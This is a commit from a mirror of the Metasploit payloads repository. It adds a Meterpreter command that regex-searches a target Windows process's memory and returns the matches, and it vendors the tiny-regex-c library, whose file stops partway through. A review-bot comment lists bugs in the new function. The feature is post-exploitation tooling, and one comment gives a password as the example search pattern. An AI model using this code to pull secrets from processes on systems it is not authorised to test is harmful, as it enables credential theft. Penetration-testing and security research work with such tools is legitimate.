mirror of https://github.com/rapid7/metasploit-payloads synced 2025-03-24 18:16:24 +01:00

Add Windows Memory Search support using regex

sjanusz-r7 2023-11-28 18:35:43 +00:00
parent 6858efcdb8
commit 6e2889d64c
10 changed files with 946 additions and 0 deletions
c/meterpreter
source
common
extensions/stdapi
tiny-regex-c
workspace/ext_server_stdapi

@ -174,6 +174,7 @@
#define COMMAND_ID_STDAPI_AUDIO_MIC_START 1115
#define COMMAND_ID_STDAPI_AUDIO_MIC_STOP 1116
#define COMMAND_ID_STDAPI_AUDIO_MIC_LIST 1117
#define COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH 1119
#define COMMAND_ID_PRIV_ELEVATE_GETSYSTEM 2001
#define COMMAND_ID_PRIV_FS_BLANK_DIRECTORY_MACE 2002
#define COMMAND_ID_PRIV_FS_BLANK_FILE_MACE 2003

@ -69,6 +69,7 @@ Command customCommands[] =
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_PROTECT, request_sys_process_memory_protect),
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_LOCK, request_sys_process_memory_lock),
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_UNLOCK, request_sys_process_memory_unlock),
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_MEMORY_SEARCH, request_sys_process_memory_search),
// Thread
COMMAND_REQ(COMMAND_ID_STDAPI_SYS_PROCESS_THREAD_OPEN, request_sys_process_thread_open),

@ -1,5 +1,6 @@
#include "precomp.h"
#include "common_metapi.h"
#include "../tiny-regex-c/re.h"
/*!
* @brief Allocates memory in the context of the supplied process.
@ -339,3 +340,343 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet)
return ERROR_SUCCESS;
}
typedef NTSTATUS* PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#ifndef __kernel_entry
#define __kernel_entry
#endif
typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE ProcessHandle, DWORD ProcessInformationClass, LPVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength);
typedef BOOL(WINAPI* READPROCESSMEMORY) (HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T mSize, SIZE_T* lpNumberOfBytesRead);
typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject);
typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId);
typedef FARPROC(WINAPI* GETPROCADDRESS) (HMODULE hModule, LPCSTR lpProcName);
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtReadVirtualMemory.html
// https://ntdoc.m417z.com/ntreadvirtualmemory
typedef NTSTATUS(NTAPI* NTREADVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, LPVOID Buffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead);
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FMEMORY_INFORMATION_CLASS.html
typedef enum _MEMORY_INFORMATION_CLASS {
MemoryBasicInformation
} MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS;
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtQueryVirtualMemory.html
typedef __kernel_entry NTSTATUS(NTAPI* NTQUERYVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, LPVOID Buffer, SIZE_T Length, PSIZE_T ResultLength);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef UNICODE_STRING* PUNICODE_STRING;
typedef const UNICODE_STRING* PCUNICODE_STRING;
// https://learn.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_object_attributes
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
// https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/a11e7129-685b-4535-8d37-21d4596ac057
typedef struct _CLIENT_ID {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html
// https://ntdoc.m417z.com/ntopenprocess
typedef NTSTATUS(NTAPI* NTOPENPROCESS) (PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
//typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
//{
// DWORD dwLength;
// DWORD dwInitialized;
// LPVOID lpSsHandle;
// LIST_ENTRY InLoadOrderModuleList;
// LIST_ENTRY InMemoryOrderModuleList;
// LIST_ENTRY InInitializationOrderModuleList;
// LPVOID lpEntryInProgress;
//} PEB_LDR_DATA, * PPEB_LDR_DATA;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
BYTE Reserved1[16];
PVOID Reserved2[10];
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
typedef
VOID
(NTAPI* PPS_POST_PROCESS_INIT_ROUTINE) (
VOID
);
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
BYTE Reserved4[104];
PVOID Reserved5[52];
PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;
BYTE Reserved6[128];
PVOID Reserved7[1];
ULONG SessionId;
} PEB, * PPEB;
typedef struct _PROCESS_BASIC_INFORMATION {
PVOID Reserved1;
PPEB PebBaseAddress;
PVOID Reserved2[2];
ULONG_PTR UniqueProcessId;
PVOID Reserved3;
} PROCESS_BASIC_INFORMATION;
typedef PROCESS_BASIC_INFORMATION* PPROCESS_BASIC_INFORMATION;
typedef enum _PROCESSINFOCLASS {
ProcessBasicInformation = 0,
ProcessWow64Information = 26
} PROCESSINFOCLASS;
BOOL can_read_memory(DWORD memory_protect)
{
const int page_execute_read = 0x20;
const int page_execute_readwrite = 0x40;
const int page_readonly = 0x02;
const int page_readwrite = 0x04;
return memory_protect == page_execute_read ||
memory_protect == page_execute_readwrite ||
memory_protect == page_readonly ||
memory_protect == page_readwrite;
}
// In order to be able to regex null-butes, we need to store the length explicitly, so that null-bytes aren't being treated as the end of a string.
struct regex_needle
{
char* raw_needle_buffer;
size_t length;
regex_t* compiled_needle;
};
#define NEEDLES_MAX (size_t)5
DWORD request_sys_process_memory_search(Remote* remote, Packet* packet)
{
Packet* response = met_api->packet.create_response(packet);
DWORD result = ERROR_SUCCESS;
char* buffer = NULL;
size_t needle_enum_index = 0;
HANDLE process_handle = NULL;
dprintf("[MEM SEARCH] Getting PID...");
const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID);
if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; }
dprintf("[MEM SEARCH] Searching PID: %lu", pid);
// Iterate over all the needles in the packet.
Tlv needle_buffer_tlv = { 0 };
struct regex_needle* regex_needles[NEEDLES_MAX];
while (needle_enum_index < (size_t)NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS)
{
// The header contains a null-terminator which we do not need.
const size_t needle_length = needle_buffer_tlv.header.length - 1;
dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle));
regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle));
if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; }
regex_needles[needle_enum_index]->length = needle_length;
regex_needles[needle_enum_index]->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char));
if (regex_needles[needle_enum_index]->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); result = ERROR_OUTOFMEMORY; goto done; }
memcpy(regex_needles[needle_enum_index]->raw_needle_buffer, (char*)needle_buffer_tlv.buffer, needle_length);
dprintf("[MEM SEARCH] Needle %u : %.*s with size (in bytes) %u", needle_enum_index, needle_length, regex_needles[needle_enum_index]->raw_needle_buffer, needle_length);
dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv.buffer);
regex_needles[needle_enum_index]->compiled_needle = re_compile(regex_needles[needle_enum_index]->raw_needle_buffer, regex_needles[needle_enum_index]->length);
if (regex_needles[needle_enum_index]->compiled_needle == NULL) { dprintf("[MEM SEARCH] Failed to compile needle"); result = ERROR_OUTOFMEMORY; goto done; }
needle_enum_index++;
}
dprintf("[MEM SEARCH] Getting Match Lengths");
const size_t min_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_UINT);
const size_t max_match_length = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN);
if (min_match_length > max_match_length || max_match_length == 0) { dprintf("[MEM SEARCH] Incorrect min or max match lengths"); result = ERROR_INVALID_PARAMETER; goto done; }
const size_t current_max_match_length = max_match_length;
dprintf("[MEM SEARCH] Getting handles & proc addresses");
const HMODULE kernel32_dll = GetModuleHandleA("kernel32.dll");
if (kernel32_dll == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); result = ERROR_INVALID_HANDLE; goto done; }
const HMODULE ntdll_dll = GetModuleHandleA("ntdll.dll");
if (ntdll_dll == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); result = ERROR_INVALID_HANDLE; goto done; }
const HANDLE get_proc_address = GetProcAddress(kernel32_dll, "GetProcAddress");
if (get_proc_address == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)get_proc_address;
const HANDLE virtual_query_ex = GetProcAddress(kernel32_dll, "VirtualQueryEx");
if (virtual_query_ex == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const HANDLE open_process = GetProcAddress(kernel32_dll, "OpenProcess");
if (open_process == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const HANDLE close_handle = GetProcAddress(kernel32_dll, "CloseHandle");
if (close_handle == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const HANDLE nt_read_virtual_memory = GetProcAddress(ntdll_dll, "NtReadVirtualMemory");
if (nt_read_virtual_memory == NULL) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); result = ERROR_INVALID_ADDRESS; goto done; }
const OPENPROCESS OpenProcess = (OPENPROCESS)open_process;
const CLOSEHANDLE CloseHandle = (CLOSEHANDLE)close_handle;
const VIRTUALQUERYEX VirtualQueryEx = (VIRTUALQUERYEX)virtual_query_ex;
const NTREADVIRTUALMEMORY NtReadVirtualMemory = (NTREADVIRTUALMEMORY)nt_read_virtual_memory;
const DWORD process_vm_read = 0x0010;
const DWORD process_query_information = 0x0400;
const DWORD wanted_process_perms = process_vm_read | process_query_information;
dprintf("[MEM SEARCH] Opening process");
process_handle = OpenProcess(wanted_process_perms, FALSE, pid);
if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; }
MEMORY_BASIC_INFORMATION mem = { 0 };
const size_t megabytes_64 = 64 * 1024 * 1024;
dprintf("[MEM SEARCH] Allocating buffer for storing process memory");
buffer = (char*)malloc(megabytes_64);
if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; }
// The maximum length of data that we can read into a buffer at a time from a memory region.
const size_t current_max_size = megabytes_64;
for (size_t current_ptr = 0; VirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize)
{
if (!can_read_memory(mem.Protect)) { continue; }
size_t memory_region_offset = 0;
// Note: This currently does not support regex'ing over multiple memory regions.
// e.g.
// regex = "my_password.*";
// | ....my_pas | sword.... |
while (mem.RegionSize > memory_region_offset)
{
const size_t leftover_bytes = mem.RegionSize - memory_region_offset;
const size_t bytes_to_read = min(leftover_bytes, current_max_size);
dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes);
dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read);
size_t bytes_read = 0;
const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset;
// Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached.
const NTSTATUS read_virtual_memory_status = NtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read);
if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; }
dprintf("[MEM SEARCH] Read %llu bytes", bytes_read);
// Note: Increment the offset so that we aren't stuck in an infinite loop, trying to read zero bytes from the same pointer.
if (bytes_read == 0) { dprintf("[MEM SEARCH] Read zero bytes from a readable memory region"); memory_region_offset += bytes_to_read; continue; }
for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++)
{
// This is the buffer offset for this needle only.
size_t current_buffer_offset = 0;
size_t match_length = 0;
int result = -1;
do
{
const char* current_buffer_ptr = buffer + current_buffer_offset;
const size_t bytes_to_regex = bytes_read - current_buffer_offset;
result = re_matchp(regex_needles[current_needle_index]->compiled_needle, current_buffer_ptr, bytes_to_regex, &match_length);
if (result != -1)
{
const size_t match_address = read_address + result;
dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --");
dprintf("[MEM SEARCH] Address: %p", match_address);
dprintf("[MEM SEARCH] Creating results group");
Packet* search_results = met_api->packet.create_group();
if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); result = ERROR_OUTOFMEMORY; goto done; }
dprintf("[MEM SEARCH] Adding results to packet group");
dprintf("[MEM SEARCH] Adding Match bytes");
// TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached.
const size_t current_match_length = min(max_match_length, match_length);
// Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash.
met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, buffer + current_buffer_offset + result, (DWORD)current_match_length);
dprintf("[MEM SEARCH] Adding Match address");
met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address);
dprintf("[MEM SEARCH] Adding Region base address");
met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, (size_t)mem.BaseAddress);
dprintf("[MEM SEARCH] Adding Region size");
met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, mem.RegionSize);
dprintf("[MEM SEARCH] Adding Match Length");
met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)current_match_length);
dprintf("[MEM SEARCH] Adding Group");
met_api->packet.add_group(response, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results);
current_buffer_offset += (result + current_match_length);
}
} while (result != -1);
}
memory_region_offset += bytes_to_read;
}
}
result = ERROR_SUCCESS;
done:
dprintf("[MEM SEARCH] Memory Search complete.");
if (buffer != NULL) { dprintf("[MEM SEARCH] Freeing process memory buffer."); free(buffer); }
if (process_handle != NULL) { dprintf("[MEM SEARCH] Closing process handle."); CloseHandle(process_handle); }
dprintf("[MEM SEARCH] Cleaning up needles");
for (size_t i = 0; i < needle_enum_index; i++)
{
if (regex_needles[i] != NULL)
{
if (regex_needles[i]->raw_needle_buffer != NULL)
{
dprintf("[MEM SEARCH] Freeing needle buffer");
free(regex_needles[i]->raw_needle_buffer);
}
dprintf("[MEM SEARCH] Freeing regex needle.");
free(regex_needles[i]);
}
}
dprintf("[MEM SEARCH] Transmitting response");
met_api->packet.transmit_response(result, remote, response);
return ERROR_SUCCESS;
}
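Review bot: Inside the per-needle loop of `request_sys_process_memory_search`, `int result = -1;` shadows the function-level `DWORD result`, so the `result = ERROR_OUTOFMEMORY; goto done;` taken when `create_group()` fails only updates the inner variable and the response is still transmitted with `ERROR_SUCCESS`; renaming the inner one, e.g. `int match_offset = -1;`, keeps the two apart. The same loop advances by `result + current_match_length`, which is zero when the engine reports an empty match at offset 0, so the `do … while (result != -1)` may never terminate; advancing by at least one byte in that case would bound it. `match_address` is computed as `read_address + result` although `result` is relative to `buffer + current_buffer_offset`, so the reported address looks wrong for every match after the first in a chunk, while the `add_tlv_raw` call for the same match does include the offset. On the error paths in the needle-parsing loop, `goto done` runs before `needle_enum_index++`, so the entry being built is skipped by the cleanup loop and its allocations leak; `min_match_length` is read and range-checked but not used afterwards.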

@ -46,6 +46,7 @@ DWORD request_sys_process_memory_query(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_protect(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_lock(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet);
DWORD request_sys_process_memory_search(Remote *remote, Packet *packet);
// Thread
DWORD request_sys_process_thread_open(Remote *remote, Packet *packet);

@ -98,6 +98,15 @@
#define TLV_TYPE_REGISTER_VALUE_32 MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2542 )
#define TLV_TYPE_REGISTER MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2550 )
// Memory - Taken from Mettle: https://github.com/rapid7/mettle/blob/master/mettle/src/tlv_types.h#L262
#define TLV_TYPE_MEMORY_SEARCH_NEEDLE MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2650 )
#define TLV_TYPE_MEMORY_SEARCH_RESULTS MAKE_CUSTOM_TLV( TLV_META_TYPE_GROUP, TLV_TYPE_EXTENSION_STDAPI, 2651 )
#define TLV_TYPE_MEMORY_SEARCH_MATCH_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_UINT, TLV_TYPE_EXTENSION_STDAPI, 2652 )
#define TLV_TYPE_MEMORY_SEARCH_START_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2653 )
#define TLV_TYPE_MEMORY_SEARCH_SECT_LEN MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2654 )
#define TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 2655 )
#define TLV_TYPE_MEMORY_SEARCH_MATCH_STR MAKE_CUSTOM_TLV( TLV_META_TYPE_STRING, TLV_TYPE_EXTENSION_STDAPI, 2656 )
// Registry
#define TLV_TYPE_HKEY MAKE_CUSTOM_TLV( TLV_META_TYPE_QWORD, TLV_TYPE_EXTENSION_STDAPI, 1000 )
#define TLV_TYPE_ROOT_KEY TLV_TYPE_HKEY

@ -0,0 +1,3 @@
# tiny-regex-c
This library is taken from https://github.com/kokke/tiny-regex-c/tree/2d306a5a71128853d18292e8bb85c8e745fbc9d0 - with changes to support null-bytes.

@ -0,0 +1,511 @@
/*
*
* Mini regex-module inspired by Rob Pike's regex code described in:
*
* http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html
*
*
*
* Supports:
* ---------
* '.' Dot, matches any character
* '^' Start anchor, matches beginning of string
* '$' End anchor, matches end of string
* '*' Asterisk, match zero or more (greedy)
* '+' Plus, match one or more (greedy)
* '?' Question, match zero or one (non-greedy)
* '[abc]' Character class, match if one of {'a', 'b', 'c'}
* '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken!
* '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z }
* '\s' Whitespace, \t \f \r \n \v and spaces
* '\S' Non-whitespace
* '\w' Alphanumeric, [a-zA-Z0-9_]
* '\W' Non-alphanumeric
* '\d' Digits, [0-9]
* '\D' Non-digits
*
*
*/
#include "re.h"
#include <stdio.h>
#include <ctype.h>
/* Definitions: */
#define MAX_REGEXP_OBJECTS 256 /* Max number of regex symbols in expression. */
#define MAX_CHAR_CLASS_LEN 256 /* Max length of character-class buffer in. */
enum { UNUSED, DOT, BEGIN, END, QUESTIONMARK, STAR, PLUS, CHAR, CHAR_CLASS, INV_CHAR_CLASS, DIGIT, NOT_DIGIT, ALPHA, NOT_ALPHA, WHITESPACE, NOT_WHITESPACE, /* BRANCH */ };
/* Private function declarations: */
static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
static int matchcharclass(char c, const char* str);
static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength);
static int matchone(regex_t p, char c);
static int matchdigit(char c);
static int matchalpha(char c);
static int matchwhitespace(char c);
static int matchmetachar(char c, const char* str);
static int matchrange(char c, const char* str);
static int matchdot(char c);
static int ismetachar(char c);
/* Public functions: */
int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength)
{
return re_matchp(re_compile(pattern, pattern_length), text, text_length, matchlength);
}
int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength)
{
*matchlength = 0;
if (pattern == 0 || text_length == 0) { return -1; }
if (pattern[0].type == BEGIN)
{
return ((matchpattern(&pattern[1], text, text_length, 0, matchlength)) ? 0 : -1);
}
size_t idx = -1;
do
{
idx += 1;
if (matchpattern(pattern, text, text_length, idx, matchlength))
{
return (int)idx;
}
}
while (idx < text_length);
return -1;
}
re_t re_compile(const char* pattern, size_t pattern_length)
{
/* The sizes of the two static arrays below substantiates the static RAM usage of this module.
MAX_REGEXP_OBJECTS is the max number of symbols in the expression.
MAX_CHAR_CLASS_LEN determines the size of buffer for chars in all char-classes in the expression. */
static regex_t re_compiled[MAX_REGEXP_OBJECTS];
static unsigned char ccl_buf[MAX_CHAR_CLASS_LEN];
int ccl_bufidx = 1;
char c; /* current char in pattern */
int i = 0; /* index into pattern */
int j = 0; /* index into re_compiled */
while (i < (int)pattern_length && (j+1 < MAX_REGEXP_OBJECTS))
{
c = pattern[i];
switch (c)
{
/* Meta-characters: */
case '^': { re_compiled[j].type = BEGIN; } break;
case '$': { re_compiled[j].type = END; } break;
case '.': { re_compiled[j].type = DOT; } break;
case '*': { re_compiled[j].type = STAR; } break;
case '+': { re_compiled[j].type = PLUS; } break;
case '?': { re_compiled[j].type = QUESTIONMARK; } break;
/* case '|': { re_compiled[j].type = BRANCH; } break; <-- not working properly */
/* Escaped character-classes (\s \w ...): */
case '\\':
{
if (i + 1 < (int)pattern_length)
{
/* Skip the escape-char '\\' */
i += 1;
/* ... and check the next */
switch (pattern[i])
{
/* Meta-character: */
case 'd': { re_compiled[j].type = DIGIT; } break;
case 'D': { re_compiled[j].type = NOT_DIGIT; } break;
case 'w': { re_compiled[j].type = ALPHA; } break;
case 'W': { re_compiled[j].type = NOT_ALPHA; } break;
case 's': { re_compiled[j].type = WHITESPACE; } break;
case 'S': { re_compiled[j].type = NOT_WHITESPACE; } break;
/* Escaped character, e.g. '.' or '$' */
default:
{
re_compiled[j].type = CHAR;
re_compiled[j].u.ch = pattern[i];
} break;
}
}
/* '\\' as last char in pattern -> invalid regular expression. */
/*
else
{
re_compiled[j].type = CHAR;
re_compiled[j].ch = pattern[i];
}
*/
} break;
/* Character class: */
case '[':
{
/* Remember where the char-buffer starts. */
int buf_begin = ccl_bufidx;
/* Look-ahead to determine if negated */
if (pattern[i+1] == '^')
{
re_compiled[j].type = INV_CHAR_CLASS;
i += 1; /* Increment i to avoid including '^' in the char-buffer */
if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '^' */
{
return 0;
}
}
else
{
re_compiled[j].type = CHAR_CLASS;
}
/* Copy characters inside [..] to buffer */
while ( (pattern[++i] != ']')
&& (pattern[i] != '\0')) /* Missing ] */
{
if (pattern[i] == '\\')
{
if (ccl_bufidx >= MAX_CHAR_CLASS_LEN - 1)
{
//fputs("exceeded internal buffer!\n", stderr);
return 0;
}
if (pattern[i+1] == 0) /* incomplete pattern, missing non-zero char after '\\' */
{
return 0;
}
ccl_buf[ccl_bufidx++] = pattern[i++];
}
else if (ccl_bufidx >= MAX_CHAR_CLASS_LEN)
{
//fputs("exceeded internal buffer!\n", stderr);
return 0;
}
ccl_buf[ccl_bufidx++] = pattern[i];
}
if (ccl_bufidx >= MAX_CHAR_CLASS_LEN)
{
/* Catches cases such as [00000000000000000000000000000000000000][ */
//fputs("exceeded internal buffer!\n", stderr);
return 0;
}
/* Null-terminate string end */
ccl_buf[ccl_bufidx++] = 0;
re_compiled[j].u.ccl = &ccl_buf[buf_begin];
} break;
/* Other characters: */
default:
{
re_compiled[j].type = CHAR;
re_compiled[j].u.ch = c;
} break;
}
/* no buffer-out-of-bounds access on invalid patterns - see https://github.com/kokke/tiny-regex-c/commit/1a279e04014b70b0695fba559a7c05d55e6ee90b */
if (pattern[i] == 0)
{
return 0;
}
i += 1;
j += 1;
}
/* 'UNUSED' is a sentinel used to indicate end-of-pattern */
re_compiled[j].type = UNUSED;
return (re_t) re_compiled;
}
void re_print(regex_t* pattern)
{
const char* types[] = { "UNUSED", "DOT", "BEGIN", "END", "QUESTIONMARK", "STAR", "PLUS", "CHAR", "CHAR_CLASS", "INV_CHAR_CLASS", "DIGIT", "NOT_DIGIT", "ALPHA", "NOT_ALPHA", "WHITESPACE", "NOT_WHITESPACE", "BRANCH" };
int i;
int j;
char c;
for (i = 0; i < MAX_REGEXP_OBJECTS; ++i)
{
if (pattern[i].type == UNUSED)
{
break;
}
printf("type: %s", types[pattern[i].type]);
if (pattern[i].type == CHAR_CLASS || pattern[i].type == INV_CHAR_CLASS)
{
printf(" [");
for (j = 0; j < MAX_CHAR_CLASS_LEN; ++j)
{
c = pattern[i].u.ccl[j];
if ((c == '\0') || (c == ']'))
{
break;
}
printf("%c", c);
}
printf("]");
}
else if (pattern[i].type == CHAR)
{
printf(" '%c'", pattern[i].u.ch);
}
printf("\n");
}
}
/* Private functions: */
static int matchdigit(char c)
{
return isdigit(c);
}
static int matchalpha(char c)
{
return isalpha(c);
}
static int matchwhitespace(char c)
{
return isspace(c);
}
static int matchalphanum(char c)
{
return ((c == '_') || matchalpha(c) || matchdigit(c));
}
static int matchrange(char c, const char* str)
{
return ( (c != '-')
&& (str[0] != '\0')
&& (str[0] != '-')
&& (str[1] == '-')
&& (str[2] != '\0')
&& ( (c >= str[0])
&& (c <= str[2])));
}
static int matchdot(char c)
{
#if defined(RE_DOT_MATCHES_NEWLINE) && (RE_DOT_MATCHES_NEWLINE == 1)
(void)c;
return 1;
#else
return c != '\n' && c != '\r';
#endif
}
static int ismetachar(char c)
{
return ((c == 's') || (c == 'S') || (c == 'w') || (c == 'W') || (c == 'd') || (c == 'D'));
}
static int matchmetachar(char c, const char* str)
{
switch (str[0])
{
case 'd': return matchdigit(c);
case 'D': return !matchdigit(c);
case 'w': return matchalphanum(c);
case 'W': return !matchalphanum(c);
case 's': return matchwhitespace(c);
case 'S': return !matchwhitespace(c);
default: return (c == str[0]);
}
}
static int matchcharclass(char c, const char* str)
{
do
{
if (matchrange(c, str))
{
return 1;
}
else if (str[0] == '\\')
{
/* Escape-char: increment str-ptr and match on next char */
str += 1;
if (matchmetachar(c, str))
{
return 1;
}
else if ((c == str[0]) && !ismetachar(c))
{
return 1;
}
}
else if (c == str[0])
{
if (c == '-')
{
return ((str[-1] == '\0') || (str[1] == '\0'));
}
else
{
return 1;
}
}
}
while (*str++ != '\0');
return 0;
}
static int matchone(regex_t p, char c)
{
switch (p.type)
{
case DOT: return matchdot(c);
case CHAR_CLASS: return matchcharclass(c, (const char*)p.u.ccl);
case INV_CHAR_CLASS: return !matchcharclass(c, (const char*)p.u.ccl);
case DIGIT: return matchdigit(c);
case NOT_DIGIT: return !matchdigit(c);
case ALPHA: return matchalphanum(c);
case NOT_ALPHA: return !matchalphanum(c);
case WHITESPACE: return matchwhitespace(c);
case NOT_WHITESPACE: return !matchwhitespace(c);
default: return (p.u.ch == c);
}
}
static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength)
{
size_t prelen = *matchlength;
const char* prepoint = text;
while ((text_offset < text_length) && matchone(p, text[text_offset]))
{
text_offset++;
(*matchlength)++;
}
